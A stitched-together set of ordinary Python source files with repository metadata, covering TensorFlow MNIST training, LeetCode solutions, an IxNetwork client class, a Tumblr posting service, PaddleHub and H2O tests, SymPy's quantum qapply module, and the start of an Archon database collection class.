optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
train_op = optimizer.minimize(loss_op)
# Evaluate model (with test logits, for dropout to be disabled)
# 评估模型(使用测试日志,禁用dropout)
correct_pred = tf.equal(tf.argmax(prediction, 1), tf.argmax(Y, 1))
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
# Initialize the variables (i.e. assign their default value)
# 初始化变量(即分配它们的默认值)
init = tf.global_variables_initializer()
# Start training
# 开始训练
with tf.Session() as sess:
# Run the initializer
# 运行初始化程序
sess.run(init)
for step in range(1, training_steps+1):
batch_x, batch_y = mnist.train.next_batch(batch_size)
# Reshape data to get 28 seq of 28 elements
batch_x = batch_x.reshape((batch_size, timesteps, num_input))
# Run optimization op (backprop)
# 运行优化操作(backprop)
sess.run(train_op, feed_dict={X: batch_x, Y: batch_y})
if step % display_step == 0 or step == 1:
# Calculate batch loss and accuracy
# 计算批次损失和准确性
loss, acc = sess.run([loss_op, accuracy], feed_dict={X: batch_x,
Y: batch_y})
print("Step " + str(step) + ", Minibatch Loss= " + \
"{:.4f}".format(loss) + ", Training Accuracy= " + \
"{:.3f}".format(acc))
print("Optimization Finished(优化完成)!")
# Calculate accuracy for 128 mnist test images
# 计算128个mnist测试图像的准确性
test_len = 128
test_data = mnist.test.images[:test_len].reshape((-1, timesteps, num_input))
test_label = mnist.test.labels[:test_len]
print("Testing Accuracy(测试精度):", \
sess.run(accuracy, feed_dict={X: test_data, Y: test_label}))
# 分类
test_len = 1
test_data = mnist.test.images[:test_len].reshape((-1, timesteps, num_input))
test_label = mnist.test.labels[:test_len]
print(test_data.shape, test_label)
print("分类:", \
sess.run(prediction, feed_dict={X: test_data}))
| [
"hello.sea@qq.com"
] | hello.sea@qq.com |
63d933c42c52f5dad03c2785b2cbacddca98e2da | 256f817910dd698970fab89871c6ce66a3c416e7 | /1. solvedProblems/144. Binary Tree Preorder Traversal/144.py | 50f8569065e9e235a6bb9942442d7b1f0a208ec5 | [] | no_license | tgaochn/leetcode | 5926c71c1555d2659f7db4eff9e8cb9054ea9b60 | 29f1bd681ae823ec6fe755c8f91bfe1ca80b6367 | refs/heads/master | 2023-02-25T16:12:42.724889 | 2021-02-04T21:05:34 | 2021-02-04T21:05:34 | 319,225,860 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,880 | py | # !/usr/bin/env python
# coding: utf-8
"""
Author:
Tian Gao (tgaochn@gmail.com)
CreationDate:
Thu, 09/03/2020, 19:33
# !! Description:
Given a binary tree, return the preorder traversal of its nodes' values.
Example:
Input: [1,null,2,3]
1
\
2
/
3
Output: [1,2,3]
Follow up: Recursive solution is trivial, could you do it iteratively?
"""
from typing import List
import sys
sys.path.append('..')
from utils import binaryTree
from utils import singleLinkedList
from utils import nTree
ListNode = singleLinkedList.ListNode
TreeNode = binaryTree.TreeNode
Node = nTree.Node
null = None
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
    def preorderTraversal(self, root: TreeNode) -> List[int]:
        """Return the preorder (root, left, right) values of the tree.

        Iterative version with an explicit stack -- same results as the
        recursive formulation, and answers the follow-up question.
        """
        values = []
        pending = [root]
        while pending:
            node = pending.pop()
            if node is None:
                continue
            values.append(node.val)
            # Push right first so the left subtree is visited first.
            pending.append(node.right)
            pending.append(node.left)
        return values
    # endFunc
# endClass
def func():
    """Ad-hoc harness: run every function in myFuncLis against every input
    set, printing inputs and results.  Tree / n-ary-tree parameters are
    printed on their own line for readability.

    Fix: the splitter for the third parameter was computed from
    ``isOneInstance(para3Splitter, ...)`` (the previous splitter value)
    instead of ``inputPara3`` -- a copy/paste slip that made tree-valued
    third arguments print on the same line.
    """
    s = Solution()

    # !! change function name and para here
    myFuncLis = [
        s.preorderTraversal,
    ]
    inputParaLis1 = [
        binaryTree.buildTree([1, null, 2, 3]),
        # singleLinkedList.buildSingleList([])
        # binaryTree.buildTree([])
        # nTree.buildTree([])
    ]
    inputParaLis2 = [
        None,
    ]
    inputParaLis3 = [
        None,
    ]

    # !! ====================================
    # ! instances that need an empty line
    specialTypeLis = [TreeNode, Node]

    # ! function and parameters count
    inputSetCnt = len(inputParaLis1)
    funcCnt = len(myFuncLis)
    # Infer arity from whether the extra parameter lists are populated.
    funcParaCnt = 1
    if not inputParaLis3[0] is None:
        funcParaCnt = 3
    elif not inputParaLis2[0] is None:
        funcParaCnt = 2

    # ! for each input set
    for i in range(inputSetCnt):
        inputPara1 = inputParaLis1[i]
        para1Splitter = '\n' if isOneInstance(inputPara1, specialTypeLis) else '\t'
        inputPara2 = None
        para2Splitter = None
        inputPara3 = None
        para3Splitter = None

        # ! start a new line if the parameter is a tree
        if funcParaCnt >= 2:
            inputPara2 = inputParaLis2[i]
            para2Splitter = '\n' if isOneInstance(inputPara2, specialTypeLis) else '\t'
        if funcParaCnt >= 3:
            inputPara3 = inputParaLis3[i]
            para3Splitter = '\n' if isOneInstance(inputPara3, specialTypeLis) else '\t'

        # ! for each function
        for j in range(funcCnt):
            myFunc = myFuncLis[j]
            print('func: \t%s' % myFunc.__name__)

            # ! output parameters
            if funcParaCnt == 1:
                print('input1:%s%s' % (para1Splitter, inputPara1))
                rlt = myFunc(inputPara1)
            if funcParaCnt == 2:
                print('input1:%s%s' % (para1Splitter, inputPara1))
                print('input2:%s%s' % (para2Splitter, inputPara2))
                rlt = myFunc(inputPara1, inputPara2)
            if funcParaCnt == 3:
                print('input1:%s%s' % (para1Splitter, inputPara1))
                print('input2:%s%s' % (para2Splitter, inputPara2))
                print('input3:%s%s' % (para3Splitter, inputPara3))
                rlt = myFunc(inputPara1, inputPara2, inputPara3)

            # ! output result
            rltSplitter = '\n' if isinstance(rlt, TreeNode) else '\t'
            print('rlt:%s%s' % (rltSplitter, rlt))
            print('==' * 20)
# endFunc
def isOneInstance(myInstance, typeLis):
    """Return True if *myInstance* is an instance of any type in *typeLis*."""
    return any(isinstance(myInstance, cls) for cls in typeLis)
# endFunc
def main():
    """Entry point: run the ad-hoc test harness."""
    func()
# endMain


if __name__ == "__main__":
    main()
# endIf
| [
"tgaochn@gmail.com"
] | tgaochn@gmail.com |
5349216cdfed5b4f42f237fa94627ee5f92d1f1e | 0afe73244e4d0ff7ef2b7f242475f4db2ac844ac | /225-Implement-Stack-Using-Queues.py | 3bfe9a890c44c1fb1883bd83fb9c27e20c678480 | [] | no_license | liuspencersjtu/MyLeetCode | 7261c7cfae4a175c6ca67dfe471e8c847a805a53 | b7d9238d692b1b2f5ab8f73a76d02228a71a4d15 | refs/heads/master | 2023-04-17T04:56:52.999553 | 2023-04-10T06:21:36 | 2023-04-10T06:21:36 | 129,114,505 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,008 | py | class MyStack:
    def __init__(self):
        """
        Initialize your data structure here.
        """
        self.N = 8         # capacity of each internal queue
        self.storage = []  # archived full queues, oldest first
        self.queue = []    # active queue receiving new pushes (newest last)
def push(self, x: int) -> None:
"""
Push element x onto stack.
"""
if len(self.queue) == self.N:
self.storage.append(self.queue)
self.queue = []
self.queue.append(x)
    def pop(self) -> int:
        """
        Removes the element on top of the stack and returns that element.
        """
        # If the active queue is exhausted, refill it from the most recently
        # archived queue (the last one in storage), using only dequeue and
        # enqueue operations.
        if not self.queue:
            newstorage = []
            M = len(self.storage)
            for i in range(0, M - 1):
                newstorage.append(self.storage.pop(0))
            self.queue = self.storage.pop(0)   # last archived queue = newest elements
            self.storage = newstorage
        # Rotate the active queue: dequeue everything, keeping all but the
        # final (most recently pushed) element, which is the stack top.
        newqueue = []
        M = len(self.queue)
        for i in range(0, M - 1):
            newqueue.append(self.queue.pop(0))
        res = self.queue.pop(0)
        self.queue = newqueue
        return res
    def top(self) -> int:
        """
        Get the top element.
        """
        # Same refill step as pop(): restore the active queue from the most
        # recently archived queue when it is empty.
        if not self.queue:
            newstorage = []
            M = len(self.storage)
            for i in range(0, M - 1):
                newstorage.append(self.storage.pop(0))
            self.queue = self.storage.pop(0)
            self.storage = newstorage
        # Rotate through the queue like pop(), but re-append the last
        # element so the stack is left unchanged.
        newqueue = []
        M = len(self.queue)
        for i in range(0, M - 1):
            newqueue.append(self.queue.pop(0))
        res = self.queue.pop(0)
        newqueue.append(res)
        self.queue = newqueue
        return res
def empty(self) -> bool:
"""
Returns whether the stack is empty.
"""
if not self.queue and not self.storage:
return True
else:
return False
# Your MyStack object will be instantiated and called as such:
# obj = MyStack()
# obj.push(x)
# param_2 = obj.pop()
# param_3 = obj.top()
# param_4 = obj.empty()
| [
"liusjtu@163.com"
] | liusjtu@163.com |
42e942cd2287432d6752b37a8aca4c458a069162 | 1eab574606dffb14a63195de994ee7c2355989b1 | /ixnetwork_restpy/testplatform/sessions/ixnetwork/globals/topology/rsvpteif/rsvpteif.py | 88c9ed3fbfd85e9f4cbc16696c5a34b98ce2ce67 | [
"MIT"
] | permissive | steiler/ixnetwork_restpy | 56b3f08726301e9938aaea26f6dcd20ebf53c806 | dd7ec0d311b74cefb1fe310d57b5c8a65d6d4ff9 | refs/heads/master | 2020-09-04T12:10:18.387184 | 2019-11-05T11:29:43 | 2019-11-05T11:29:43 | 219,728,796 | 0 | 0 | null | 2019-11-05T11:28:29 | 2019-11-05T11:28:26 | null | UTF-8 | Python | false | false | 2,597 | py | # MIT LICENSE
#
# Copyright 1997 - 2019 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class RsvpteIf(Base):
    """Rsvp Port Specific Data
    The RsvpteIf class encapsulates a required rsvpteIf resource which will be retrieved from the server every time the property is accessed.
    """

    # Generated accessor class: attribute values are fetched from /
    # pushed to the IxNetwork server via Base's _get/_set helpers.
    __slots__ = ()
    _SDM_NAME = 'rsvpteIf'  # server-side resource name

    def __init__(self, parent):
        super(RsvpteIf, self).__init__(parent)

    @property
    def Count(self):
        """Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.

        Returns:
            number
        """
        return self._get_attribute('count')

    @property
    def DescriptiveName(self):
        """Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offers more context

        Returns:
            str
        """
        return self._get_attribute('descriptiveName')

    @property
    def Name(self):
        """Name of NGPF element, guaranteed to be unique in Scenario

        Returns:
            str
        """
        return self._get_attribute('name')
    @Name.setter
    def Name(self, value):
        self._set_attribute('name', value)

    @property
    def RowNames(self):
        """Name of rows

        Returns:
            list(str)
        """
        return self._get_attribute('rowNames')

    def update(self, Name=None):
        """Updates a child instance of rsvpteIf on the server.

        Args:
            Name (str): Name of NGPF element, guaranteed to be unique in Scenario

        Raises:
            ServerError: The server has encountered an uncategorized error condition
        """
        # _update inspects the caller's locals() to build the request payload.
        self._update(locals())
| [
"srvc_cm_packages@keysight.com"
] | srvc_cm_packages@keysight.com |
039cbe8608cd535c8a4a29803b5a2b437830c3b2 | cad8656cd25abaeb310805a603c6b777a9ce36c7 | /th_tumblr/my_tumblr.py | bdb62644a8aeca0260277bc032ea2f201911312c | [
"BSD-3-Clause"
] | permissive | vaibhavsingh97/django-th | 25dce736473a7a3244969e72e35515c147aa7617 | e50c04d2f0961d81738c9d3d9cc3b710d303223f | refs/heads/master | 2021-07-06T07:10:10.323894 | 2017-09-27T22:01:28 | 2017-09-27T22:01:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,945 | py | # coding: utf-8
from pytumblr import TumblrRestClient
# django classes
from django.conf import settings
from django.core.cache import caches
from logging import getLogger
# django_th classes
from django_th.services.services import ServicesMgr
"""
handle process with tumblr
put the following in th_settings.py
TH_TUMBLR = {
'consumer_key': 'abcdefghijklmnopqrstuvwxyz',
'consumer_secret': 'abcdefghijklmnopqrstuvwxyz',
}
"""
logger = getLogger('django_th.trigger_happy')
cache = caches['th_tumblr']
class ServiceTumblr(ServicesMgr):
    """
    Service Tumblr: OAuth1-based service that publishes text posts
    to a Tumblr blog.
    """
    def __init__(self, token=None, **kwargs):
        """
        :param token: persisted OAuth credentials as "<key>#TH#<secret>",
                      or None before the user has authorized the app
        :param kwargs: forwarded to ServicesMgr
        """
        super(ServiceTumblr, self).__init__(token, **kwargs)
        self.AUTH_URL = 'https://www.tumblr.com/oauth/authorize'
        self.ACC_TOKEN = 'https://www.tumblr.com/oauth/access_token'
        self.REQ_TOKEN = 'https://www.tumblr.com/oauth/request_token'
        self.consumer_key = settings.TH_TUMBLR['consumer_key']
        self.consumer_secret = settings.TH_TUMBLR['consumer_secret']
        self.token = token
        self.service = 'ServiceTumblr'
        self.oauth = 'oauth1'
        if self.token is not None:
            # Token pair is stored as a single '#TH#'-delimited string.
            token_key, token_secret = self.token.split('#TH#')

            self.tumblr = TumblrRestClient(self.consumer_key,
                                           self.consumer_secret,
                                           token_key,
                                           token_secret)

    def read_data(self, **kwargs):
        """
        get the data from the service

        as the pocket service does not have any date
        in its API linked to the note,
        add the triggered date to the dict data
        thus the service will be triggered when data will be found

        :param kwargs: contain keyword args : trigger_id at least
        :type kwargs: dict

        :rtype: list
        """
        trigger_id = kwargs.get('trigger_id')
        # Tumblr is used as a publishing target only: no data is read,
        # so just reset this trigger's cache to an empty list.
        data = list()
        cache.set('th_tumblr_' + str(trigger_id), data)

    def save_data(self, trigger_id, **data):
        """
        let's save the data

        :param trigger_id: trigger ID from which to save data
        :param data: the data to check to be used and save
        :type trigger_id: int
        :type data:  dict
        :return: the status of the save statement
        :rtype: boolean
        """
        from th_tumblr.models import Tumblr

        # Parent class extracts (title, content) from the raw trigger data.
        title, content = super(ServiceTumblr, self).save_data(trigger_id,
                                                              **data)

        # get the data of this trigger
        trigger = Tumblr.objects.get(trigger_id=trigger_id)

        # we suppose we use a tag property for this service
        status = self.tumblr.create_text(blogname=trigger.blogname,
                                         title=title,
                                         body=content,
                                         state='published',
                                         tags=trigger.tag)

        return status

    def auth(self, request):
        """
        let's auth the user to the Service

        :param request: request object
        :return: callback url
        :rtype: string that contains the url to redirect after auth
        """
        request_token = super(ServiceTumblr, self).auth(request)
        callback_url = self.callback_url(request)

        # URL to redirect user to, to authorize your app
        auth_url_str = '{auth_url}?oauth_token={token}'
        auth_url_str += '&oauth_callback={callback_url}'
        auth_url = auth_url_str.format(auth_url=self.AUTH_URL,
                                       token=request_token['oauth_token'],
                                       callback_url=callback_url)

        return auth_url
| [
"foxmaskhome@gmail.com"
] | foxmaskhome@gmail.com |
a0abb5323de5e3698ebe794809bd7fb17ecf33db | 5095200e9ca55cd3a37af34ed44448c02e2a1bb5 | /modules/image/Image_editing/super_resolution/falsr_c/test.py | 7878cff3ec169539bbfd57ca65586924cd80cb63 | [
"Apache-2.0"
] | permissive | PaddlePaddle/PaddleHub | 8712603ef486c45e83eb0bc5725b0b3ed3ddbbde | b402610a6f0b382a978e82473b541ea1fc6cf09a | refs/heads/develop | 2023-07-24T06:03:13.172978 | 2023-03-28T11:49:55 | 2023-03-28T11:49:55 | 162,672,577 | 12,914 | 2,239 | Apache-2.0 | 2023-07-06T21:38:19 | 2018-12-21T06:00:48 | Python | UTF-8 | Python | false | false | 2,228 | py | import os
import shutil
import unittest
import cv2
import numpy as np
import requests
import paddlehub as hub
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
class TestHubModule(unittest.TestCase):
    # Exercises the PaddleHub "falsr_c" super-resolution module:
    # reconstruct() on paths / ndarray inputs, error handling, and
    # inference-model export.

    @classmethod
    def setUpClass(cls) -> None:
        # Download a small test image once for the whole test class.
        # Requires network access; fails fast on a non-200 response.
        img_url = 'https://unsplash.com/photos/1sLIu1XKQrY/download?ixid=MnwxMjA3fDB8MXxhbGx8MTJ8fHx8fHwyfHwxNjYyMzQxNDUx&force=true&w=120'
        if not os.path.exists('tests'):
            os.makedirs('tests')
        response = requests.get(img_url)
        assert response.status_code == 200, 'Network Error.'
        with open('tests/test.jpg', 'wb') as f:
            f.write(response.content)
        cls.module = hub.Module(name="falsr_c")

    @classmethod
    def tearDownClass(cls) -> None:
        # Remove everything the tests wrote to disk.
        shutil.rmtree('tests')
        shutil.rmtree('inference')
        shutil.rmtree('falsr_c_output')

    def test_reconstruct1(self):
        results = self.module.reconstruct(paths=['tests/test.jpg'], use_gpu=False, visualization=False)
        self.assertIsInstance(results[0]['data'], np.ndarray)

    def test_reconstruct2(self):
        results = self.module.reconstruct(images=[cv2.imread('tests/test.jpg')], use_gpu=False, visualization=False)
        self.assertIsInstance(results[0]['data'], np.ndarray)

    def test_reconstruct3(self):
        results = self.module.reconstruct(images=[cv2.imread('tests/test.jpg')], use_gpu=False, visualization=True)
        self.assertIsInstance(results[0]['data'], np.ndarray)

    def test_reconstruct4(self):
        results = self.module.reconstruct(images=[cv2.imread('tests/test.jpg')], use_gpu=True, visualization=False)
        self.assertIsInstance(results[0]['data'], np.ndarray)

    def test_reconstruct5(self):
        # Non-existent path must raise.
        self.assertRaises(AssertionError, self.module.reconstruct, paths=['no.jpg'])

    def test_reconstruct6(self):
        # A raw string where an image array is expected must raise.
        self.assertRaises(AttributeError, self.module.reconstruct, images=['test.jpg'])

    def test_save_inference_model(self):
        self.module.save_inference_model('./inference/model')
        self.assertTrue(os.path.exists('./inference/model.pdmodel'))
        self.assertTrue(os.path.exists('./inference/model.pdiparams'))


if __name__ == "__main__":
    unittest.main()
| [
"noreply@github.com"
] | PaddlePaddle.noreply@github.com |
c4a605613e91c76b4e0754596377aee10e660d64 | 0bde5f7f09aa537ed1f4828d4e5ebee66475918f | /h2o-py/tests/testdir_javapredict/pyunit_PUBDEV_5529_leaf_node_GBM_mojo.py | ff5a10ab4f881208f357c15af321fa6571aa912f | [
"Apache-2.0"
] | permissive | Winfredemalx54/h2o-3 | d69f1c07e1f5d2540cb0ce5e6073415fa0780d32 | dfb163c82ff3bfa6f88cdf02465a9bb4c8189cb7 | refs/heads/master | 2022-12-14T08:59:04.109986 | 2020-09-23T08:36:59 | 2020-09-23T08:36:59 | 297,947,978 | 2 | 0 | Apache-2.0 | 2020-09-23T11:28:54 | 2020-09-23T11:28:54 | null | UTF-8 | Python | false | false | 1,368 | py | from __future__ import print_function
import sys, os
sys.path.insert(1, "../../../")
import h2o
from tests import pyunit_utils
from random import randint
import tempfile
# This test will compare the leaf node assignment from model predict and mojo predict to make sure they
# agree for GBM models
def gbm_leaf_node_assignment_mojo_test():
    """Check that GBM leaf-node assignments agree between H2O in-memory
    predict and MOJO predict, for a randomly chosen problem type.

    Fix: the predictor list was built with ``set(df.names) - {"respose"}``
    (misspelled), which removed nothing and silently left the "response"
    column in the feature set.
    """
    problems = ['binomial', 'multinomial', 'regression']
    PROBLEM = problems[randint(0, (len(problems) - 1))]
    TESTROWS = 2000
    df = pyunit_utils.random_dataset(PROBLEM, verbose=False, NTESTROWS=TESTROWS)
    train = df[TESTROWS:, :]
    test = df[:TESTROWS, :]
    # Exclude the response column from the predictors.
    x = list(set(df.names) - {"response"})
    params = {'ntrees': 50, 'learn_rate': 0.1, 'max_depth': 4}
    TMPDIR = tempfile.mkdtemp()
    my_gbm = pyunit_utils.build_save_model_generic(params, x, train, "response", "gbm", TMPDIR)
    MOJONAME = pyunit_utils.getMojoName(my_gbm._id)

    # Save the test frame once; h2o predict and mojo predict read the same file.
    h2o.download_csv(test[x], os.path.join(TMPDIR, 'in.csv'))
    pred_h2o, pred_mojo = pyunit_utils.mojo_predict(my_gbm, TMPDIR, MOJONAME, get_leaf_node_assignment=True)
    pyunit_utils.compare_string_frames_local(pred_h2o, pred_mojo, 0.5)
if __name__ == "__main__":
    # standalone_test boots/connects to an H2O cluster before running.
    pyunit_utils.standalone_test(gbm_leaf_node_assignment_mojo_test)
else:
    gbm_leaf_node_assignment_mojo_test()
| [
"noreply@github.com"
] | Winfredemalx54.noreply@github.com |
fcce0ac9ce077ca870306df1518eb376c131cc13 | 00a9295409b78a53ce790f7ab44931939f42c0e0 | /FPGA/apio/iCEBreaker/FIR_Filter/sympy/venv/lib/python3.8/site-packages/sympy/physics/quantum/qapply.py | 6451c185e5e353dc5a7d4302c9ca73eb0c2093af | [
"Apache-2.0"
] | permissive | klei22/Tech-OnBoarding-Class | c21f0762d2d640d5e9cb124659cded5c865b32d4 | 960e962322c37be9117e0523641f8b582a2beceb | refs/heads/master | 2022-11-10T13:17:39.128342 | 2022-10-25T08:59:48 | 2022-10-25T08:59:48 | 172,292,871 | 2 | 3 | Apache-2.0 | 2019-05-19T00:26:32 | 2019-02-24T03:50:35 | C | UTF-8 | Python | false | false | 7,070 | py | """Logic for applying operators to states.
Todo:
* Sometimes the final result needs to be expanded, we should do this by hand.
"""
from __future__ import print_function, division
from sympy import Add, Mul, Pow, sympify, S
from sympy.physics.quantum.anticommutator import AntiCommutator
from sympy.physics.quantum.commutator import Commutator
from sympy.physics.quantum.dagger import Dagger
from sympy.physics.quantum.innerproduct import InnerProduct
from sympy.physics.quantum.operator import OuterProduct, Operator
from sympy.physics.quantum.state import State, KetBase, BraBase, Wavefunction
from sympy.physics.quantum.tensorproduct import TensorProduct
__all__ = [
'qapply'
]
#-----------------------------------------------------------------------------
# Main code
#-----------------------------------------------------------------------------
def qapply(e, **options):
    """Apply operators to states in a quantum expression.

    Parameters
    ==========

    e : Expr
        The expression containing operators and states. This expression tree
        will be walked to find operators acting on states symbolically.
    options : dict
        A dict of key/value pairs that determine how the operator actions
        are carried out.

        The following options are valid:

        * ``dagger``: try to apply Dagger operators to the left
          (default: False).
        * ``ip_doit``: call ``.doit()`` in inner products when they are
          encountered (default: True).

    Returns
    =======

    e : Expr
        The original expression, but with the operators applied to states.

    Examples
    ========

        >>> from sympy.physics.quantum import qapply, Ket, Bra
        >>> b = Bra('b')
        >>> k = Ket('k')
        >>> A = k * b
        >>> A
        |k><b|
        >>> qapply(A * b.dual / (b * b.dual))
        |k>
        >>> qapply(k.dual * A / (k.dual * k), dagger=True)
        <b|
        >>> qapply(k.dual * A / (k.dual * k))
        <k|*|k><b|/<k|k>
    """
    from sympy.physics.quantum.density import Density

    dagger = options.get('dagger', False)

    if e == 0:
        return S.Zero

    # This may be a bit aggressive but ensures that everything gets expanded
    # to its simplest form before trying to apply operators. This includes
    # things like (A+B+C)*|a> and A*(|a>+|b>) and all Commutators and
    # TensorProducts. The only problem with this is that if we can't apply
    # all the Operators, we have just expanded everything.
    # TODO: don't expand the scalars in front of each Mul.
    e = e.expand(commutator=True, tensorproduct=True)

    # If we just have a raw ket, return it.
    if isinstance(e, KetBase):
        return e

    # We have an Add(a, b, c, ...) and compute
    # Add(qapply(a), qapply(b), ...)
    elif isinstance(e, Add):
        result = 0
        for arg in e.args:
            result += qapply(arg, **options)
        return result.expand()

    # For a Density operator call qapply on its state
    elif isinstance(e, Density):
        new_args = [(qapply(state, **options), prob) for (state,
                     prob) in e.args]
        return Density(*new_args)

    # For a raw TensorProduct, call qapply on its args.
    elif isinstance(e, TensorProduct):
        return TensorProduct(*[qapply(t, **options) for t in e.args])

    # For a Pow, call qapply on its base.
    elif isinstance(e, Pow):
        return qapply(e.base, **options)**e.exp

    # We have a Mul where there might be actual operators to apply to kets.
    elif isinstance(e, Mul):
        # Split into commuting (scalar) and non-commuting factors; only the
        # non-commuting part can contain operator/state products to apply.
        c_part, nc_part = e.args_cnc()
        c_mul = Mul(*c_part)
        nc_mul = Mul(*nc_part)
        if isinstance(nc_mul, Mul):
            result = c_mul*qapply_Mul(nc_mul, **options)
        else:
            result = c_mul*qapply(nc_mul, **options)
        if result == e and dagger:
            # Nothing applied to the right; optionally retry on the
            # daggered expression so bras can absorb operators.
            return Dagger(qapply_Mul(Dagger(e), **options))
        else:
            return result

    # In all other cases (State, Operator, Pow, Commutator, InnerProduct,
    # OuterProduct) we won't ever have operators to apply to kets.
    else:
        return e
def qapply_Mul(e, **options):
    """Apply operators to states inside a single Mul of non-commutative factors.

    Helper for ``qapply``; works from the right end of the product.  It pops
    the two right-most non-commutative factors, tries to apply the left one
    (operator/bra/outer product/commutator) to the right one, then recurses
    on the remaining prefix.

    Parameters
    ==========
    e : Expr
        The expression to process; anything that is not a Mul of at least two
        factors is returned unchanged.
    options : dict
        ``ip_doit`` (default True): call ``.doit()`` on any InnerProduct built
        here.  All options are forwarded to recursive calls.
    """
    ip_doit = options.get('ip_doit', True)
    args = list(e.args)
    # If we only have 0 or 1 args, we have nothing to do and return.
    if len(args) <= 1 or not isinstance(e, Mul):
        return e
    rhs = args.pop()
    lhs = args.pop()
    # Make sure we have two non-commutative objects before proceeding.
    # (Wavefunctions are commutative but still need operator application.)
    if (sympify(rhs).is_commutative and not isinstance(rhs, Wavefunction)) or \
            (sympify(lhs).is_commutative and not isinstance(lhs, Wavefunction)):
        return e
    # For a Pow with an integer exponent, apply one of them and reduce the
    # exponent by one: A**n -> A**(n-1) stays in args, a single A becomes lhs.
    if isinstance(lhs, Pow) and lhs.exp.is_Integer:
        args.append(lhs.base**(lhs.exp - 1))
        lhs = lhs.base
    # Pull OuterProduct apart: |k><b| -> keep |k> in args, apply <b| as lhs.
    if isinstance(lhs, OuterProduct):
        args.append(lhs.ket)
        lhs = lhs.bra
    # Call .doit() on Commutator/AntiCommutator; an Add result distributes
    # over the remaining product.
    if isinstance(lhs, (Commutator, AntiCommutator)):
        comm = lhs.doit()
        if isinstance(comm, Add):
            return qapply(
                e.func(*(args + [comm.args[0], rhs])) +
                e.func(*(args + [comm.args[1], rhs])),
                **options
            )
        else:
            return qapply(e.func(*args)*comm*rhs, **options)
    # Apply tensor products of operators to states factor-by-factor when the
    # two TensorProducts have matching length.
    if isinstance(lhs, TensorProduct) and all([isinstance(arg, (Operator, State, Mul, Pow)) or arg == 1 for arg in lhs.args]) and \
            isinstance(rhs, TensorProduct) and all([isinstance(arg, (Operator, State, Mul, Pow)) or arg == 1 for arg in rhs.args]) and \
            len(lhs.args) == len(rhs.args):
        result = TensorProduct(*[qapply(lhs.args[n]*rhs.args[n], **options) for n in range(len(lhs.args))]).expand(tensorproduct=True)
        return qapply_Mul(e.func(*args), **options)*result
    # Now try to actually apply the operator and build an inner product.
    # Either side may implement _apply_operator; fall back to InnerProduct
    # for a <bra|ket> pair, else give up (result = None).
    try:
        result = lhs._apply_operator(rhs, **options)
    except (NotImplementedError, AttributeError):
        try:
            result = rhs._apply_operator(lhs, **options)
        except (NotImplementedError, AttributeError):
            if isinstance(lhs, BraBase) and isinstance(rhs, KetBase):
                result = InnerProduct(lhs, rhs)
                if ip_doit:
                    result = result.doit()
            else:
                result = None
    # TODO: I may need to expand before returning the final result.
    if result == 0:
        return S.Zero
    elif result is None:
        # Nothing could be applied: keep rhs and retry with lhs re-attached.
        if len(args) == 0:
            # We had two args to begin with so args=[].
            return e
        else:
            return qapply_Mul(e.func(*(args + [lhs])), **options)*rhs
    elif isinstance(result, InnerProduct):
        return result*qapply_Mul(e.func(*args), **options)
    else: # result is a scalar times a Mul, Add or TensorProduct
        return qapply(e.func(*args)*result, **options)
| [
"kaunalei@gmail.com"
] | kaunalei@gmail.com |
2a82d8b1e75cb8cc0f45a4059ea1ca39356f6b3a | 6ed01f4503fc9de234a561c945adff7cf4b1c81b | /ncar_lib/archon_db/archon_collection.py | 12c9bd72f0864de0c2c86d6575a12e1b0d505f2d | [] | no_license | ostwald/python-lib | b851943c913a68424a05ce3c7b42878ff9519f68 | 9acd97ffaa2f57b3e9e632e1b75016549beb29e5 | refs/heads/master | 2021-10-28T06:33:34.156095 | 2021-10-21T23:54:49 | 2021-10-21T23:54:49 | 69,060,616 | 0 | 1 | null | 2018-06-21T16:05:30 | 2016-09-23T21:04:46 | Roff | UTF-8 | Python | false | false | 3,326 | py | """
API - getCollection (archon_db_coll_id) - returns ArchonDBCollection instance
"""
import os, sys, re
# from mysql import GenericDB, TableRow
# import MySQLdb
from archonDB import ArchonDB
from mysql import TableRow
class ArchonDBCollection ():
    """Read-only view of one collection in an Archon database.

    Exposes:
     - collection : TableRow for the collection record (or None if not found)
     - title      : the collection's 'Title' field (or None)
     - items      : list of TableRow instances for all content items
    """
    def __init__ (self, archon_db, coll_id):
        # archon_db: an ArchonDB connection wrapper; coll_id: tblCollections ID.
        self.db = archon_db
        self.coll_id = coll_id
        self.collection = self.getCollectionRec()
        self.items = self.getContentItems()
        # and/or idiom: yields None when the record is missing.  NOTE(review):
        # it also yields None when 'Title' is present but falsy (e.g. '').
        self.title = self.collection and self.collection['Title'] or None

    def getCollectionRec (self, schema=None):
        """Fetch this collection's record from tblCollections_Collections.

        schema -- optional list of column names to select (default: all
        columns, with the schema read from the table).  Returns a TableRow
        or None when no row matches.
        """
        table_name = 'tblCollections_Collections'
        if schema is None:
            schema = self.db.getSchema(table_name)
            q_fields = '*'
        else:
            q_fields = ','.join(schema)

        queryStr = """SELECT %s
                      FROM %s
